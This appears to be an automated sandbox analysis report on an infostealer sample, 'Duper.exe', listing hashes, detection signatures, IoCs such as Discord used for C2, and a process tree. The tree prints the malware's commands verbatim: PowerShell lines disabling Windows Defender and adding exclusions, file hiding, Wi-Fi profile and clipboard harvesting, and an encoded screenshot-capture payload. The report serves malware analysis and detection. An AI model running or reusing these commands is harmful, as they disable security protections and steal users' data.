70f79e08ffce3875dfd6d01a55f71f0735bed751967dc551ec670347a1b342cf

Analysis

max time kernel
135s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 22:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Duper.exe
Size

7.5MB
MD5

dbe88d16efc88646a419dff70619b1af
SHA1

79603b1414bdf176da7729eaa2c4e8686171c275
SHA256

70f79e08ffce3875dfd6d01a55f71f0735bed751967dc551ec670347a1b342cf
SHA512

e6a63102cd8f936fd25337aaa243c6b53ffaa8817866e476e7c5209a532e09572c3bf1f7fc37446897d124a644f287143cfd9fc4d1c9f1cb582359f181733597
SSDEEP

196608:sYiEzoLjv+bhqNVoB8Ck5c7GpNlpn41J2+bk9qtlDfJ6:KDL+9qz88Ck+7q3p41J8qfI

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
920	powershell.exe
3936	powershell.exe
4748	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Duper.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
3700	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe
1880	Duper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002344d-21.dat	upx
behavioral2/memory/1880-25-0x00007FFCBB430000-0x00007FFCBBB08000-memory.dmp	upx
behavioral2/files/0x0007000000023441-28.dat	upx
behavioral2/files/0x000700000002344b-29.dat	upx
behavioral2/files/0x0007000000023448-46.dat	upx
behavioral2/files/0x0007000000023447-45.dat	upx
behavioral2/files/0x0007000000023446-44.dat	upx
behavioral2/files/0x0007000000023445-43.dat	upx
behavioral2/files/0x0007000000023444-42.dat	upx
behavioral2/files/0x0007000000023443-41.dat	upx
behavioral2/files/0x0007000000023442-40.dat	upx
behavioral2/files/0x0007000000023440-39.dat	upx
behavioral2/files/0x0007000000023453-38.dat	upx
behavioral2/files/0x0007000000023452-37.dat	upx
behavioral2/files/0x0007000000023450-35.dat	upx
behavioral2/files/0x000700000002344c-32.dat	upx
behavioral2/files/0x000700000002344a-31.dat	upx
behavioral2/memory/1880-48-0x00007FFCD06A0000-0x00007FFCD06AF000-memory.dmp	upx
behavioral2/memory/1880-47-0x00007FFCCAE70000-0x00007FFCCAE95000-memory.dmp	upx
behavioral2/memory/1880-54-0x00007FFCCA7B0000-0x00007FFCCA7DD000-memory.dmp	upx
behavioral2/memory/1880-56-0x00007FFCCDF80000-0x00007FFCCDF99000-memory.dmp	upx
behavioral2/memory/1880-58-0x00007FFCCA670000-0x00007FFCCA694000-memory.dmp	upx
behavioral2/memory/1880-60-0x00007FFCBAE90000-0x00007FFCBB006000-memory.dmp	upx
behavioral2/memory/1880-62-0x00007FFCCA650000-0x00007FFCCA669000-memory.dmp	upx
behavioral2/memory/1880-64-0x00007FFCCE680000-0x00007FFCCE68D000-memory.dmp	upx
behavioral2/memory/1880-66-0x00007FFCCA610000-0x00007FFCCA643000-memory.dmp	upx
behavioral2/memory/1880-68-0x00007FFCC9920000-0x00007FFCC99ED000-memory.dmp	upx
behavioral2/memory/1880-72-0x00007FFCBA960000-0x00007FFCBAE82000-memory.dmp	upx
behavioral2/memory/1880-78-0x00007FFCCE050000-0x00007FFCCE05D000-memory.dmp	upx
behavioral2/memory/1880-80-0x00007FFCBB310000-0x00007FFCBB42B000-memory.dmp	upx
behavioral2/memory/1880-77-0x00007FFCCA6F0000-0x00007FFCCA704000-memory.dmp	upx
behavioral2/memory/1880-75-0x00007FFCCAE70000-0x00007FFCCAE95000-memory.dmp	upx
behavioral2/memory/1880-71-0x00007FFCBB430000-0x00007FFCBBB08000-memory.dmp	upx
behavioral2/memory/1880-220-0x00007FFCCA670000-0x00007FFCCA694000-memory.dmp	upx
behavioral2/memory/1880-285-0x00007FFCBAE90000-0x00007FFCBB006000-memory.dmp	upx
behavioral2/memory/1880-314-0x00007FFCCAE70000-0x00007FFCCAE95000-memory.dmp	upx
behavioral2/memory/1880-327-0x00007FFCBB310000-0x00007FFCBB42B000-memory.dmp	upx
behavioral2/memory/1880-324-0x00007FFCBA960000-0x00007FFCBAE82000-memory.dmp	upx
behavioral2/memory/1880-323-0x00007FFCC9920000-0x00007FFCC99ED000-memory.dmp	upx
behavioral2/memory/1880-322-0x00007FFCCA610000-0x00007FFCCA643000-memory.dmp	upx
behavioral2/memory/1880-319-0x00007FFCBAE90000-0x00007FFCBB006000-memory.dmp	upx
behavioral2/memory/1880-313-0x00007FFCBB430000-0x00007FFCBBB08000-memory.dmp	upx
behavioral2/memory/1880-335-0x00007FFCCA650000-0x00007FFCCA669000-memory.dmp	upx
behavioral2/memory/1880-342-0x00007FFCBB310000-0x00007FFCBB42B000-memory.dmp	upx
behavioral2/memory/1880-343-0x00007FFCBB430000-0x00007FFCBBB08000-memory.dmp	upx
behavioral2/memory/1880-341-0x00007FFCCE050000-0x00007FFCCE05D000-memory.dmp	upx
behavioral2/memory/1880-340-0x00007FFCCA6F0000-0x00007FFCCA704000-memory.dmp	upx
behavioral2/memory/1880-338-0x00007FFCC9920000-0x00007FFCC99ED000-memory.dmp	upx
behavioral2/memory/1880-337-0x00007FFCCA610000-0x00007FFCCA643000-memory.dmp	upx
behavioral2/memory/1880-336-0x00007FFCCE680000-0x00007FFCCE68D000-memory.dmp	upx
behavioral2/memory/1880-334-0x00007FFCBAE90000-0x00007FFCBB006000-memory.dmp	upx
behavioral2/memory/1880-339-0x00007FFCBA960000-0x00007FFCBAE82000-memory.dmp	upx
behavioral2/memory/1880-333-0x00007FFCCA670000-0x00007FFCCA694000-memory.dmp	upx
behavioral2/memory/1880-332-0x00007FFCCDF80000-0x00007FFCCDF99000-memory.dmp	upx
behavioral2/memory/1880-331-0x00007FFCCA7B0000-0x00007FFCCA7DD000-memory.dmp	upx
behavioral2/memory/1880-330-0x00007FFCD06A0000-0x00007FFCD06AF000-memory.dmp	upx
behavioral2/memory/1880-329-0x00007FFCCAE70000-0x00007FFCCAE95000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
37	discord.com
38	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
33	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1480	WMIC.exe
4500	WMIC.exe
3100	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
544	tasklist.exe
4588	tasklist.exe
3912	tasklist.exe
2456	tasklist.exe
3944	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4684	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4488	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2068	powershell.exe
2068	powershell.exe
3936	powershell.exe
3936	powershell.exe
2068	powershell.exe
3936	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
2272	powershell.exe
2272	powershell.exe
4748	powershell.exe
4748	powershell.exe
2272	powershell.exe
4748	powershell.exe
4568	powershell.exe
4568	powershell.exe
528	powershell.exe
528	powershell.exe
528	powershell.exe
1452	powershell.exe
1452	powershell.exe
1452	powershell.exe
2168	powershell.exe
2168	powershell.exe
2168	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3660	WMIC.exe
Token: SeSecurityPrivilege	3660	WMIC.exe
Token: SeTakeOwnershipPrivilege	3660	WMIC.exe
Token: SeLoadDriverPrivilege	3660	WMIC.exe
Token: SeSystemProfilePrivilege	3660	WMIC.exe
Token: SeSystemtimePrivilege	3660	WMIC.exe
Token: SeProfSingleProcessPrivilege	3660	WMIC.exe
Token: SeIncBasePriorityPrivilege	3660	WMIC.exe
Token: SeCreatePagefilePrivilege	3660	WMIC.exe
Token: SeBackupPrivilege	3660	WMIC.exe
Token: SeRestorePrivilege	3660	WMIC.exe
Token: SeShutdownPrivilege	3660	WMIC.exe
Token: SeDebugPrivilege	3660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3660	WMIC.exe
Token: SeRemoteShutdownPrivilege	3660	WMIC.exe
Token: SeUndockPrivilege	3660	WMIC.exe
Token: SeManageVolumePrivilege	3660	WMIC.exe
Token: 33	3660	WMIC.exe
Token: 34	3660	WMIC.exe
Token: 35	3660	WMIC.exe
Token: 36	3660	WMIC.exe
Token: SeDebugPrivilege	544	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3660	WMIC.exe
Token: SeSecurityPrivilege	3660	WMIC.exe
Token: SeTakeOwnershipPrivilege	3660	WMIC.exe
Token: SeLoadDriverPrivilege	3660	WMIC.exe
Token: SeSystemProfilePrivilege	3660	WMIC.exe
Token: SeSystemtimePrivilege	3660	WMIC.exe
Token: SeProfSingleProcessPrivilege	3660	WMIC.exe
Token: SeIncBasePriorityPrivilege	3660	WMIC.exe
Token: SeCreatePagefilePrivilege	3660	WMIC.exe
Token: SeBackupPrivilege	3660	WMIC.exe
Token: SeRestorePrivilege	3660	WMIC.exe
Token: SeShutdownPrivilege	3660	WMIC.exe
Token: SeDebugPrivilege	3660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3660	WMIC.exe
Token: SeRemoteShutdownPrivilege	3660	WMIC.exe
Token: SeUndockPrivilege	3660	WMIC.exe
Token: SeManageVolumePrivilege	3660	WMIC.exe
Token: 33	3660	WMIC.exe
Token: 34	3660	WMIC.exe
Token: 35	3660	WMIC.exe
Token: 36	3660	WMIC.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeIncreaseQuotaPrivilege	1480	WMIC.exe
Token: SeSecurityPrivilege	1480	WMIC.exe
Token: SeTakeOwnershipPrivilege	1480	WMIC.exe
Token: SeLoadDriverPrivilege	1480	WMIC.exe
Token: SeSystemProfilePrivilege	1480	WMIC.exe
Token: SeSystemtimePrivilege	1480	WMIC.exe
Token: SeProfSingleProcessPrivilege	1480	WMIC.exe
Token: SeIncBasePriorityPrivilege	1480	WMIC.exe
Token: SeCreatePagefilePrivilege	1480	WMIC.exe
Token: SeBackupPrivilege	1480	WMIC.exe
Token: SeRestorePrivilege	1480	WMIC.exe
Token: SeShutdownPrivilege	1480	WMIC.exe
Token: SeDebugPrivilege	1480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1480	WMIC.exe
Token: SeRemoteShutdownPrivilege	1480	WMIC.exe
Token: SeUndockPrivilege	1480	WMIC.exe
Token: SeManageVolumePrivilege	1480	WMIC.exe
Token: 33	1480	WMIC.exe
Token: 34	1480	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 1880	1796	Duper.exe	83
PID 1796 wrote to memory of 1880	1796	Duper.exe	83
PID 1880 wrote to memory of 4004	1880	Duper.exe	86
PID 1880 wrote to memory of 4004	1880	Duper.exe	86
PID 1880 wrote to memory of 3412	1880	Duper.exe	87
PID 1880 wrote to memory of 3412	1880	Duper.exe	87
PID 1880 wrote to memory of 3836	1880	Duper.exe	88
PID 1880 wrote to memory of 3836	1880	Duper.exe	88
PID 1880 wrote to memory of 2352	1880	Duper.exe	91
PID 1880 wrote to memory of 2352	1880	Duper.exe	91
PID 1880 wrote to memory of 3332	1880	Duper.exe	95
PID 1880 wrote to memory of 3332	1880	Duper.exe	95
PID 3836 wrote to memory of 2156	3836	cmd.exe	97
PID 3836 wrote to memory of 2156	3836	cmd.exe	97
PID 3412 wrote to memory of 2068	3412	cmd.exe	98
PID 3412 wrote to memory of 2068	3412	cmd.exe	98
PID 3332 wrote to memory of 3660	3332	cmd.exe	99
PID 3332 wrote to memory of 3660	3332	cmd.exe	99
PID 2352 wrote to memory of 544	2352	cmd.exe	100
PID 2352 wrote to memory of 544	2352	cmd.exe	100
PID 4004 wrote to memory of 3936	4004	cmd.exe	101
PID 4004 wrote to memory of 3936	4004	cmd.exe	101
PID 1880 wrote to memory of 3884	1880	Duper.exe	103
PID 1880 wrote to memory of 3884	1880	Duper.exe	103
PID 3884 wrote to memory of 2468	3884	cmd.exe	105
PID 3884 wrote to memory of 2468	3884	cmd.exe	105
PID 1880 wrote to memory of 3632	1880	Duper.exe	106
PID 1880 wrote to memory of 3632	1880	Duper.exe	106
PID 3632 wrote to memory of 2688	3632	cmd.exe	108
PID 3632 wrote to memory of 2688	3632	cmd.exe	108
PID 1880 wrote to memory of 232	1880	Duper.exe	109
PID 1880 wrote to memory of 232	1880	Duper.exe	109
PID 232 wrote to memory of 1480	232	cmd.exe	111
PID 232 wrote to memory of 1480	232	cmd.exe	111
PID 1880 wrote to memory of 4472	1880	Duper.exe	149
PID 1880 wrote to memory of 4472	1880	Duper.exe	149
PID 4472 wrote to memory of 4500	4472	cmd.exe	184
PID 4472 wrote to memory of 4500	4472	cmd.exe	184
PID 1880 wrote to memory of 4420	1880	Duper.exe	115
PID 1880 wrote to memory of 4420	1880	Duper.exe	115
PID 1880 wrote to memory of 4416	1880	Duper.exe	116
PID 1880 wrote to memory of 4416	1880	Duper.exe	116
PID 4420 wrote to memory of 628	4420	cmd.exe	119
PID 4420 wrote to memory of 628	4420	cmd.exe	119
PID 4416 wrote to memory of 920	4416	cmd.exe	120
PID 4416 wrote to memory of 920	4416	cmd.exe	120
PID 1880 wrote to memory of 1600	1880	Duper.exe	121
PID 1880 wrote to memory of 1600	1880	Duper.exe	121
PID 1880 wrote to memory of 1064	1880	Duper.exe	122
PID 1880 wrote to memory of 1064	1880	Duper.exe	122
PID 1880 wrote to memory of 3616	1880	Duper.exe	125
PID 1880 wrote to memory of 3616	1880	Duper.exe	125
PID 1880 wrote to memory of 2184	1880	Duper.exe	126
PID 1880 wrote to memory of 2184	1880	Duper.exe	126
PID 1880 wrote to memory of 3608	1880	Duper.exe	128
PID 1880 wrote to memory of 3608	1880	Duper.exe	128
PID 1880 wrote to memory of 1404	1880	Duper.exe	130
PID 1880 wrote to memory of 1404	1880	Duper.exe	130
PID 1880 wrote to memory of 1412	1880	Duper.exe	132
PID 1880 wrote to memory of 1412	1880	Duper.exe	132
PID 1880 wrote to memory of 5116	1880	Duper.exe	134
PID 1880 wrote to memory of 5116	1880	Duper.exe	134
PID 1880 wrote to memory of 764	1880	Duper.exe	136
PID 1880 wrote to memory of 764	1880	Duper.exe	136

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2152	attrib.exe
4080	attrib.exe
628	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Duper.exe
"C:\Users\Admin\AppData\Local\Temp\Duper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Users\Admin\AppData\Local\Temp\Duper.exe
  "C:\Users\Admin\AppData\Local\Temp\Duper.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Duper.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Duper.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Not currently working try again later', 0, 'Duper', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Not currently working try again later', 0, 'Duper', 0+16);close()"
      4⤵
      PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3884
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3632
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Duper.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4420
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Duper.exe"
      4⤵
      Views/modifies file attributes
      PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1600
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1064
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3616
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:2184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1404
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:1412
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5116
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:764
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAg